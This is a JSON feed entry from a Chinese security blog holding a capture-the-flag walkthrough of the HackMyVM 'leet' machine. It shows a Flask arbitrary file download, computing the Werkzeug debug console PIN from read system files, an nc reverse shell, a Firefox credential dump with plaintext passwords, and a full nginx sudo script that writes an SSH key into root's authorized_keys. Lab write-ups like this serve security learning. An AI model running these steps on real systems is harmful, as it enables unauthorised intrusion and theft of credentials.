{
    "version": "https://jsonfeed.org/version/1",
    "title": "K1t0 • All posts by \"渗透靶场\" tag",
    "description": "一点小分享",
    "home_page_url": "https://k1t0111.github.io",
    "items": [
        {
            "id": "https://k1t0111.github.io/2024/09/15/Hackmyvm-leet/",
            "url": "https://k1t0111.github.io/2024/09/15/Hackmyvm-leet/",
            "title": "Hackmyvm-leet",
            "date_published": "2024-09-15T06:51:32.000Z",
            "content_html": "<h3 id=\"信息收集\"><a class=\"anchor\" href=\"#信息收集\">#</a> 信息收集</h3>\n<h4 id=\"端口扫描\"><a class=\"anchor\" href=\"#端口扫描\">#</a> 端口扫描</h4>\n<figure class=\"highlight shell\"><figcaption data-lang=\"Bash\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre>PORT     STATE SERVICE</pre></td></tr><tr><td data-num=\"2\"></td><td><pre><span class=\"token number\">22</span>/tcp   <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span></pre></td></tr><tr><td data-num=\"3\"></td><td><pre><span class=\"token number\">7777</span>/tcp <span class=\"token function\">open</span>  cbt</pre></td></tr><tr><td data-num=\"4\"></td><td><pre></pre></td></tr><tr><td data-num=\"5\"></td><td><pre><span class=\"token number\">22</span>/tcp   <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">9</span>.2p1 Debian <span class=\"token number\">2</span>+deb12u2 <span class=\"token punctuation\">(</span>protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"6\"></td><td><pre><span class=\"token operator\">|</span> ssh-hostkey: </pre></td></tr><tr><td data-num=\"7\"></td><td><pre><span class=\"token operator\">|</span>   <span class=\"token number\">256</span> e15d7cb7079217dc46767dbea95043d2 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"8\"></td><td><pre><span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> a0f3b38693f5588288dde510db35de62 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"9\"></td><td><pre><span class=\"token number\">7777</span>/tcp <span class=\"token function\">open</span>  http    Werkzeug httpd <span class=\"token number\">3.0</span>.1 <span class=\"token punctuation\">(</span>Python <span class=\"token number\">3.11</span>.2<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"10\"></td><td><pre><span class=\"token operator\">|</span>_http-server-header: Werkzeug/3.0.1 Python/3.11.2</pre></td></tr><tr><td data-num=\"11\"></td><td><pre><span class=\"token operator\">|</span>_http-title: Site doesn't have a title <span class=\"token punctuation\">(</span>text/html<span class=\"token punctuation\">;</span> <span class=\"token assign-left variable\">charset</span><span class=\"token operator\">=</span>utf-8<span class=\"token punctuation\">)</span>.</pre></td></tr><tr><td data-num=\"12\"></td><td><pre>MAC Address: 08:00:27:2B:F0:9A <span class=\"token punctuation\">(</span>Oracle VirtualBox virtual NIC<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"13\"></td><td><pre>Warning: OSScan results may be unreliable because we could not <span class=\"token function\">find</span> at least <span class=\"token number\">1</span> <span class=\"token function\">open</span> and <span class=\"token number\">1</span> closed port</pre></td></tr><tr><td data-num=\"14\"></td><td><pre>Device type: general purpose</pre></td></tr><tr><td data-num=\"15\"></td><td><pre>Running: Linux <span class=\"token number\">4</span>.X<span class=\"token operator\">|</span><span class=\"token number\">5</span>.X</pre></td></tr><tr><td data-num=\"16\"></td><td><pre>OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5</pre></td></tr><tr><td data-num=\"17\"></td><td><pre>OS details: Linux <span class=\"token number\">4.15</span> - <span class=\"token number\">5.6</span></pre></td></tr><tr><td data-num=\"18\"></td><td><pre>Network Distance: <span class=\"token number\">1</span> hop</pre></td></tr><tr><td data-num=\"19\"></td><td><pre>Service Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel</pre></td></tr></table></figure><h5 id=\"资产\"><a class=\"anchor\" href=\"#资产\">#</a> 资产</h5>\n<figure class=\"highlight shell\"><figcaption data-lang=\"Bash\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre>/download             <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">500</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">14478</span><span class=\"token punctuation\">]</span></pre></td></tr><tr><td data-num=\"2\"></td><td><pre>/console              <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">200</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">1563</span><span class=\"token punctuation\">]</span></pre></td></tr></table></figure><p>Linux 4.15 - 5.6<br />\nOpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)<br />\nWerkzeug/3.0.1<br />\nPython/3.11.2<br />\nFlask 3.0.1</p>\n<h4 id=\"漏洞挖掘\"><a class=\"anchor\" href=\"#漏洞挖掘\">#</a> 漏洞挖掘</h4>\n<h5 id=\"leet编码\"><a class=\"anchor\" href=\"#leet编码\">#</a> leet 编码</h5>\n<p>你提到的 “L33T converter” 通常指的是一个将文本转换为所谓的 “leet speak” 或 “1337 speak” 的工具。这种语言转换是一种将字母替换为看起来类似的数字或符号的俚语形式，常见于网络文化，特别是早期的黑客和极客社区。</p>\n<p>在你给出的例子中：</p>\n<ul>\n<li>输入： <code>whoami</code></li>\n<li>输出： <code>wh04m1</code></li>\n</ul>\n<p>这里的转换规则大致如下：</p>\n<ul>\n<li><code>o</code>  被替换为  <code>0</code> （因为两者在视觉上相似）</li>\n<li><code>a</code>  被替换为  <code>4</code> （因为  <code>a</code>  在某些字体中类似于倒过来的  <code>4</code> ）</li>\n<li><code>i</code>  被替换为  <code>1</code> （因为两者在视觉上相似）</li>\n</ul>\n<p>这种转换的主要目的是在聊天或论坛中隐藏消息的真实含义，使其对不熟悉这种语言的人来说不那么明显。然而，这也可能被用于恶意目的，例如混淆或隐藏恶意命令或信息。</p>\n<h6 id=\"代码调试\"><a class=\"anchor\" href=\"#代码调试\">#</a> 代码调试</h6>\n<p><img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20240823105615.png\" alt=\"image.png\" /></p>\n<p>但是没用</p>\n<h6 id=\"任意文件下载\"><a class=\"anchor\" href=\"#任意文件下载\">#</a> 任意文件下载</h6>\n<p>不仅可以下载源码，同时可以下载相关敏感文件。<img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20240823150100.png\" alt=\"image.png\" /></p>\n<p>第一个思路主要是想要拿到相关的敏感文件但是没想到下载还需要权限，因此跟一个文件读取差不多了，之后针对相关 flask 框架进行源码下载</p>\n<figure class=\"highlight python\"><figcaption data-lang=\"python\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre><span class=\"token keyword\">from</span> flask <span class=\"token keyword\">import</span> Flask<span class=\"token punctuation\">,</span> request<span class=\"token punctuation\">,</span> send_file<span class=\"token punctuation\">,</span> abort<span class=\"token punctuation\">,</span> render_template_string  </pre></td></tr><tr><td data-num=\"2\"></td><td><pre><span class=\"token keyword\">from</span> werkzeug<span class=\"token punctuation\">.</span>exceptions <span class=\"token keyword\">import</span> BadRequest  </pre></td></tr><tr><td data-num=\"3\"></td><td><pre><span class=\"token keyword\">import</span> os  </pre></td></tr><tr><td data-num=\"4\"></td><td><pre>  </pre></td></tr><tr><td data-num=\"5\"></td><td><pre>app <span class=\"token operator\">=</span> Flask<span class=\"token punctuation\">(</span>__name__<span class=\"token punctuation\">)</span>  </pre></td></tr><tr><td data-num=\"6\"></td><td><pre>app<span class=\"token punctuation\">.</span>config<span class=\"token punctuation\">[</span><span class=\"token string\">'DEBUG'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span>  </pre></td></tr><tr><td data-num=\"7\"></td><td><pre>  </pre></td></tr><tr><td data-num=\"8\"></td><td><pre><span class=\"token decorator annotation punctuation\">@app<span class=\"token punctuation\">.</span>route</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/'</span><span class=\"token punctuation\">,</span> methods<span class=\"token operator\">=</span><span class=\"token punctuation\">[</span><span class=\"token string\">'GET'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'POST'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>  </pre></td></tr><tr><td data-num=\"9\"></td><td><pre><span class=\"token keyword\">def</span> <span class=\"token function\">leet_converter</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>  </pre></td></tr><tr><td data-num=\"10\"></td><td><pre><span class=\"token keyword\">if</span> request<span class=\"token punctuation\">.</span>method <span class=\"token operator\">==</span> <span class=\"token string\">'POST'</span><span class=\"token punctuation\">:</span>  </pre></td></tr><tr><td data-num=\"11\"></td><td><pre>text <span class=\"token operator\">=</span> request<span class=\"token punctuation\">.</span>form<span class=\"token punctuation\">[</span><span class=\"token string\">'text'</span><span class=\"token punctuation\">]</span>  </pre></td></tr><tr><td data-num=\"12\"></td><td><pre>leet_text <span class=\"token operator\">=</span> text<span class=\"token punctuation\">.</span>translate<span class=\"token punctuation\">(</span><span class=\"token builtin\">str</span><span class=\"token punctuation\">.</span>maketrans<span class=\"token punctuation\">(</span><span class=\"token string\">\"aeios\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"43105\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>  </pre></td></tr><tr><td data-num=\"13\"></td><td><pre>output_filename <span class=\"token operator\">=</span> <span class=\"token string\">\"/tmp/converted_text.txt\"</span>  </pre></td></tr><tr><td data-num=\"14\"></td><td><pre><span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>output_filename<span class=\"token punctuation\">,</span> <span class=\"token string\">\"w\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>  </pre></td></tr><tr><td data-num=\"15\"></td><td><pre>f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>leet_text<span class=\"token punctuation\">)</span>  </pre></td></tr><tr><td data-num=\"16\"></td><td><pre><span class=\"token keyword\">return</span> render_template_string<span class=\"token punctuation\">(</span><span class=\"token triple-quoted-string string\">'''  </pre></td></tr><tr><td data-num=\"17\"></td><td><pre>&lt;!DOCTYPE html>  </pre></td></tr><tr><td data-num=\"18\"></td><td><pre>&lt;html>  </pre></td></tr><tr><td data-num=\"19\"></td><td><pre>&lt;head>  </pre></td></tr><tr><td data-num=\"20\"></td><td><pre>&lt;title>L33T Convertor&lt;/title>  </pre></td></tr><tr><td data-num=\"21\"></td><td><pre>&lt;style>  </pre></td></tr><tr><td data-num=\"22\"></td><td><pre>body &#123; background-color: #333; color: #ddd; font-family: \"Courier New\", Courier, monospace; margin: 0; padding: 20px; &#125;  </pre></td></tr><tr><td data-num=\"23\"></td><td><pre>.container &#123; max-width: 600px; margin: auto; padding: 20px; background-color: #444; border-radius: 8px; &#125;  </pre></td></tr><tr><td data-num=\"24\"></td><td><pre>h2 &#123;  </pre></td></tr><tr><td data-num=\"25\"></td><td><pre>color: #eee;  </pre></td></tr><tr><td data-num=\"26\"></td><td><pre>text-align: center;  </pre></td></tr><tr><td data-num=\"27\"></td><td><pre>&#125;  </pre></td></tr><tr><td data-num=\"28\"></td><td><pre>  </pre></td></tr><tr><td data-num=\"29\"></td><td><pre>a, a:visited &#123; color: #dcdcdc; text-decoration: underline; &#125;  </pre></td></tr><tr><td data-num=\"30\"></td><td><pre>a:hover &#123; color: #ffffff; &#125;  </pre></td></tr><tr><td data-num=\"31\"></td><td><pre>form &#123; display: flex; flex-direction: column; &#125;  </pre></td></tr><tr><td data-num=\"32\"></td><td><pre>input[type=\"text\"], input[type=\"submit\"] &#123; padding: 10px; margin-top: 10px; border-radius: 4px; border: 1px solid #555; background: #555; color: #ddd; &#125;  </pre></td></tr><tr><td data-num=\"33\"></td><td><pre>input[type=\"submit\"] &#123; cursor: pointer; &#125;  </pre></td></tr><tr><td data-num=\"34\"></td><td><pre>input[type=\"submit\"]:hover &#123; background: #666; &#125;  </pre></td></tr><tr><td data-num=\"35\"></td><td><pre>&lt;/style>  </pre></td></tr><tr><td data-num=\"36\"></td><td><pre>&lt;/head>  </pre></td></tr><tr><td data-num=\"37\"></td><td><pre>&lt;body>  </pre></td></tr><tr><td data-num=\"38\"></td><td><pre>&lt;div class=\"container\">  </pre></td></tr><tr><td data-num=\"39\"></td><td><pre>&lt;h2>L33T converter&lt;/h2>  </pre></td></tr><tr><td data-num=\"40\"></td><td><pre>&lt;form method=\"post\">  </pre></td></tr><tr><td data-num=\"41\"></td><td><pre>&lt;input type=\"text\" name=\"text\" placeholder=\"Type your text here\">  </pre></td></tr><tr><td data-num=\"42\"></td><td><pre>&lt;input type=\"submit\" value=\"Convert to L33T\">  </pre></td></tr><tr><td data-num=\"43\"></td><td><pre>&lt;/form>  </pre></td></tr><tr><td data-num=\"44\"></td><td><pre>  </pre></td></tr><tr><td data-num=\"45\"></td><td><pre>&lt;/div>  </pre></td></tr><tr><td data-num=\"46\"></td><td><pre>&lt;/body>  </pre></td></tr><tr><td data-num=\"47\"></td><td><pre>&lt;/html>  </pre></td></tr><tr><td data-num=\"48\"></td><td><pre>'''</span><span class=\"token punctuation\">,</span> leet_text<span class=\"token operator\">=</span>leet_text<span class=\"token punctuation\">)</span>  </pre></td></tr><tr><td data-num=\"49\"></td><td><pre><span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>  </pre></td></tr><tr><td data-num=\"50\"></td><td><pre><span class=\"token keyword\">return</span> render_template_string<span class=\"token punctuation\">(</span><span class=\"token triple-quoted-string string\">'''  </pre></td></tr><tr><td data-num=\"51\"></td><td><pre>&lt;!DOCTYPE html>  </pre></td></tr><tr><td data-num=\"52\"></td><td><pre>&lt;html>  </pre></td></tr><tr><td data-num=\"53\"></td><td><pre>&lt;head>  </pre></td></tr><tr><td data-num=\"54\"></td><td><pre>&lt;style>  </pre></td></tr><tr><td data-num=\"55\"></td><td><pre>body &#123; background-color: #333; color: #ddd; font-family: \"Courier New\", Courier, monospace; margin: 0; padding: 20px; &#125;  </pre></td></tr><tr><td data-num=\"56\"></td><td><pre>.container &#123; max-width: 600px; margin: auto; padding: 20px; background-color: #444; border-radius: 8px; &#125;  </pre></td></tr><tr><td data-num=\"57\"></td><td><pre>h2 &#123; color: #eee; &#125;  </pre></td></tr><tr><td data-num=\"58\"></td><td><pre>form &#123; display: flex; flex-direction: column; &#125;  </pre></td></tr><tr><td data-num=\"59\"></td><td><pre>input[type=\"text\"], input[type=\"submit\"] &#123; padding: 10px; margin-top: 10px; border-radius: 4px; border: 1px solid #555; background: #555; color: #ddd; &#125;  </pre></td></tr><tr><td data-num=\"60\"></td><td><pre>input[type=\"submit\"] &#123; cursor: pointer; &#125;  </pre></td></tr><tr><td data-num=\"61\"></td><td><pre>input[type=\"submit\"]:hover &#123; background: #666; &#125;  </pre></td></tr><tr><td data-num=\"62\"></td><td><pre>&lt;/style>  </pre></td></tr><tr><td data-num=\"63\"></td><td><pre>&lt;/head>  </pre></td></tr><tr><td data-num=\"64\"></td><td><pre>&lt;body>  </pre></td></tr><tr><td data-num=\"65\"></td><td><pre>&lt;div class=\"container\">  </pre></td></tr><tr><td data-num=\"66\"></td><td><pre>&lt;center>&lt;h2>L33T Converter&lt;/h2>&lt;/center>  </pre></td></tr><tr><td data-num=\"67\"></td><td><pre>&lt;form method=\"post\">  </pre></td></tr><tr><td data-num=\"68\"></td><td><pre>&lt;input type=\"text\" name=\"text\" placeholder=\"Type your text here\">  </pre></td></tr><tr><td data-num=\"69\"></td><td><pre>&lt;input type=\"submit\" value=\"Convert to L33T\">  </pre></td></tr><tr><td data-num=\"70\"></td><td><pre>&lt;/form>  </pre></td></tr><tr><td data-num=\"71\"></td><td><pre>&lt;/div>  </pre></td></tr><tr><td data-num=\"72\"></td><td><pre>&lt;/body>  </pre></td></tr><tr><td data-num=\"73\"></td><td><pre>&lt;/html>  </pre></td></tr><tr><td data-num=\"74\"></td><td><pre>'''</span><span class=\"token punctuation\">)</span>  </pre></td></tr><tr><td data-num=\"75\"></td><td><pre>  </pre></td></tr><tr><td data-num=\"76\"></td><td><pre><span class=\"token decorator annotation punctuation\">@app<span class=\"token punctuation\">.</span>route</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/download'</span><span class=\"token punctuation\">)</span>  </pre></td></tr><tr><td data-num=\"77\"></td><td><pre><span class=\"token keyword\">def</span> <span class=\"token function\">download_file</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>  </pre></td></tr><tr><td data-num=\"78\"></td><td><pre>filename <span class=\"token operator\">=</span> request<span class=\"token punctuation\">.</span>args<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span><span class=\"token string\">'filename'</span><span class=\"token punctuation\">)</span>  </pre></td></tr><tr><td data-num=\"79\"></td><td><pre>  </pre></td></tr><tr><td data-num=\"80\"></td><td><pre><span class=\"token keyword\">if</span> <span class=\"token keyword\">not</span> filename <span class=\"token keyword\">or</span> filename<span class=\"token punctuation\">.</span>startswith<span class=\"token punctuation\">(</span><span class=\"token string\">\"/\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>  </pre></td></tr><tr><td data-num=\"81\"></td><td><pre><span class=\"token keyword\">raise</span> ValueError<span class=\"token punctuation\">(</span><span class=\"token string\">\"Parameter 'filename' invalid or missing.\"</span><span class=\"token punctuation\">)</span>  </pre></td></tr><tr><td data-num=\"82\"></td><td><pre>  </pre></td></tr><tr><td data-num=\"83\"></td><td><pre>filepath <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>path<span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span><span class=\"token string\">\"/tmp\"</span><span class=\"token punctuation\">,</span> filename<span class=\"token punctuation\">)</span>  </pre></td></tr><tr><td data-num=\"84\"></td><td><pre>  </pre></td></tr><tr><td data-num=\"85\"></td><td><pre><span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>  </pre></td></tr><tr><td data-num=\"86\"></td><td><pre><span class=\"token keyword\">return</span> send_file<span class=\"token punctuation\">(</span>filepath<span class=\"token punctuation\">,</span> as_attachment<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>  </pre></td></tr><tr><td data-num=\"87\"></td><td><pre><span class=\"token keyword\">except</span> Exception <span class=\"token keyword\">as</span> e<span class=\"token punctuation\">:</span>  </pre></td></tr><tr><td data-num=\"88\"></td><td><pre><span class=\"token keyword\">raise</span> e  </pre></td></tr><tr><td data-num=\"89\"></td><td><pre>  </pre></td></tr><tr><td data-num=\"90\"></td><td><pre><span class=\"token keyword\">if</span> __name__ <span class=\"token operator\">==</span> <span class=\"token string\">'__main__'</span><span class=\"token punctuation\">:</span>  </pre></td></tr><tr><td data-num=\"91\"></td><td><pre>app<span class=\"token punctuation\">.</span>run<span class=\"token punctuation\">(</span>debug<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">,</span> host<span class=\"token operator\">=</span><span class=\"token string\">'0.0.0.0'</span><span class=\"token punctuation\">)</span></pre></td></tr></table></figure><p>冷静一下，整理一下思路。目前已经知道了对应的 flask 框架，并且还能够下载一些文件。此时应该能够联想到对应的一些 flask 的利用操作。console 的 pin 值，如果说在信息足够的情况下，我们是可以拿到对应的 pin 值的。我们便可以使用 console 来执行一些命令。直接 getshell，一个非常常规的思路。</p>\n<h4 id=\"pin值计算\"><a class=\"anchor\" href=\"#pin值计算\">#</a> PIN 值计算</h4>\n<p>[[pin 值]] 这里可以参照大佬的一些文章介绍。可以看看 pin 值的计算流程。</p>\n<ul>\n<li>\n<ol>\n<li>username，用户名</li>\n</ol>\n</li>\n<li>\n<ol start=\"2\">\n<li>modname，默认值为 flask.app</li>\n</ol>\n</li>\n<li>\n<ol start=\"3\">\n<li>appname，默认值为 Flask</li>\n</ol>\n</li>\n<li>\n<ol start=\"4\">\n<li>moddir，flask 库下 app.py 的绝对路径</li>\n</ol>\n</li>\n<li>\n<ol start=\"5\">\n<li>uuidnode，当前网络的 mac 地址的十进制数</li>\n</ol>\n</li>\n<li>\n<ol start=\"6\">\n<li>machine_id，docker 机器 id</li>\n</ol>\n</li>\n</ul>\n<p>读取对应的 passwd 文件找到用户 这里用户不能根据 nologin 判断是不是这个用户<br />\n<img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20240914111010.png\" alt=\"image.png\" /></p>\n<ol>\n<li>www-data</li>\n<li>flask.app</li>\n<li>Flask</li>\n<li>/opt/project/venv/lib/python3.11/site-packages/flask/app.py</li>\n</ol>\n<p>现在读取对应的 mac address ，此时注意需要读取对应系统网卡上的地址，可以先看 /etc/network/interfaces 这个网络配置下文件下网卡的名称是什么再读取 /sys/class/net/interface/address 对应的物理地址。</p>\n<figure class=\"highlight shell\"><figcaption data-lang=\"Bash\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre><span class=\"token function\">curl</span>  /sys/class/net/enp0s3/address</pre></td></tr><tr><td data-num=\"2\"></td><td><pre>得到</pre></td></tr><tr><td data-num=\"3\"></td><td><pre>08:00:27:2b:f0:9a</pre></td></tr><tr><td data-num=\"4\"></td><td><pre>--<span class=\"token operator\">></span> <span class=\"token punctuation\">(</span><span class=\"token number\">10</span>进制<span class=\"token punctuation\">)</span> <span class=\"token number\">8796750213274</span></pre></td></tr></table></figure><p>id 需要两个文件<br />\n f6791f240ce6407ea271e86b78ac3bdb<br />\n 看了一些 wp 之后才发现很多都读不到 cgroup<br />\n 直接用师傅提供的 f6791f240ce6407ea271e86b78ac3bdbflaskapp.service<br />\n 开始计算，根据报错信息可以知道对应的版本是 3.11 那么可以跑对应的脚本。[[pin 值 #具体组成]]</p>\n<p>根据对应的脚本计算 pin 值为: 129-117-725</p>\n<h4 id=\"getshell\"><a class=\"anchor\" href=\"#getshell\">#</a> Getshell</h4>\n<p>分析一下，现在目前的情况就是我们已经拿到了对应的 console 的控制权限，可以直接反弹 shell<br />\n 查看一下 os ---&gt; Linux version 6.1.0-21-amd64 (debian-kernel@lists.debian.o<br />\n 直接 nc 吧弹一个 shell 回来</p>\n<figure class=\"highlight shell\"><figcaption data-lang=\"Bash\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre>rlwrap <span class=\"token parameter variable\">-cAr</span> <span class=\"token function\">nc</span> <span class=\"token parameter variable\">-nvlp</span> <span class=\"token number\">4444</span></pre></td></tr></table></figure><h4 id=\"横向提权\"><a class=\"anchor\" href=\"#横向提权\">#</a> 横向提权</h4>\n<p>分析局势，目前我们已经通过 flask 的框架拿到了相对应服务器权限。os 为 linux。则我们可以找到对应的一些操作。进行一些权限的提升。<br />\n经过查看发现 www-data 用户有 suid 权限。<br />\n<img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20240915110651.png\" alt=\"image.png\" /></p>\n<p>可以看到前面有一个 riva，这个代表的 www-data 用户可以使用 sudo 的 micro 编辑时候是以 riva 的权限使用。其实能编辑文件，第一时间肯定是想到修改 paaswd 文件。但是我们不是 root，因此只能看能不能横向到 riva 用户。</p>\n<p>可以将我们的公钥上传到对应的 riva 验证文件中，通过我们的私钥进行验证连接。<br />\n之后可以直接登录对应的账户信息。</p>\n<h4 id=\"火狐凭据\"><a class=\"anchor\" href=\"#火狐凭据\">#</a> 火狐凭据</h4>\n<p>用户目录下找到 riva 有安装 firefox，不多说直接找凭据。<br />\n<a href=\"https://github.com/unode/firefox_decrypt\">https://github.com/unode/firefox_decrypt</a></p>\n<p>Website:   <a href=\"http://leet.hmv\">http://leet.hmv</a><br />\nUsername: 'riva'<br />\nPassword: 'PGH$2r0co3L5QL'</p>\n<p>Website:   <a href=\"https://hackmyvm.eu\">https://hackmyvm.eu</a><br />\nUsername: 'riva'<br />\nPassword: 'lovelove80'</p>\n<p>进行 sudo -l 时候可以输密码</p>\n<figure class=\"highlight shell\"><figcaption data-lang=\"Bash\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre>User riva may run the following commands on leet: <span class=\"token punctuation\">(</span>root<span class=\"token punctuation\">)</span> /usr/sbin/nginx</pre></td></tr></table></figure><h4 id=\"nginx\"><a class=\"anchor\" href=\"#nginx\">#</a> nginx</h4>\n<p>参考大佬的脚本，直接将公钥传送进 root 中，再利用私钥登录。</p>\n<figure class=\"highlight shell\"><figcaption data-lang=\"Bash\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre><span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"[+] Creating configuration...\"</span></pre></td></tr><tr><td data-num=\"2\"></td><td><pre><span class=\"token function\">cat</span> <span class=\"token operator\">&lt;&lt;</span> <span class=\"token string\">EOF<span class=\"token bash punctuation\"> <span class=\"token operator\">></span> /tmp/nginx_pwn.conf</span></pre></td></tr><tr><td data-num=\"3\"></td><td><pre>user root;</pre></td></tr><tr><td data-num=\"4\"></td><td><pre>worker_processes 4;</pre></td></tr><tr><td data-num=\"5\"></td><td><pre>pid /tmp/nginx.pid;</pre></td></tr><tr><td data-num=\"6\"></td><td><pre>events &#123;</pre></td></tr><tr><td data-num=\"7\"></td><td><pre>        worker_connections 768;</pre></td></tr><tr><td data-num=\"8\"></td><td><pre>&#125;</pre></td></tr><tr><td data-num=\"9\"></td><td><pre>http &#123;</pre></td></tr><tr><td data-num=\"10\"></td><td><pre>\tserver &#123;</pre></td></tr><tr><td data-num=\"11\"></td><td><pre>\t        listen 1339;</pre></td></tr><tr><td data-num=\"12\"></td><td><pre>\t        root /;</pre></td></tr><tr><td data-num=\"13\"></td><td><pre>\t        autoindex on;</pre></td></tr><tr><td data-num=\"14\"></td><td><pre>\t        dav_methods PUT;</pre></td></tr><tr><td data-num=\"15\"></td><td><pre>\t&#125;</pre></td></tr><tr><td data-num=\"16\"></td><td><pre>&#125;</pre></td></tr><tr><td data-num=\"17\"></td><td><pre>EOF</span></pre></td></tr><tr><td data-num=\"18\"></td><td><pre><span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"[+] Loading configuration...\"</span></pre></td></tr><tr><td data-num=\"19\"></td><td><pre><span class=\"token function\">sudo</span> nginx <span class=\"token parameter variable\">-c</span> /tmp/nginx_pwn.conf</pre></td></tr><tr><td data-num=\"20\"></td><td><pre><span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"[+] Generating SSH Key...\"</span></pre></td></tr><tr><td data-num=\"21\"></td><td><pre>ssh-keygen</pre></td></tr><tr><td data-num=\"22\"></td><td><pre><span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"[+] Display SSH Private Key for copy...\"</span></pre></td></tr><tr><td data-num=\"23\"></td><td><pre><span class=\"token function\">cat</span> .ssh/id_rsa</pre></td></tr><tr><td data-num=\"24\"></td><td><pre><span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"[+] Add key to root user...\"</span></pre></td></tr><tr><td data-num=\"25\"></td><td><pre><span class=\"token function\">curl</span> <span class=\"token parameter variable\">-X</span> PUT localhost:1339/root/.ssh/authorized_keys <span class=\"token parameter variable\">-d</span> <span class=\"token string\">\"<span class=\"token variable\"><span class=\"token variable\">$(</span><span class=\"token function\">cat</span> .ssh/id_rsa.pub<span class=\"token variable\">)</span></span>\"</span></pre></td></tr><tr><td data-num=\"26\"></td><td><pre><span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"[+] Use the SSH key to get access\"</span></pre></td></tr></table></figure>",
            "tags": [
                "渗透靶场"
            ]
        }
    ]
}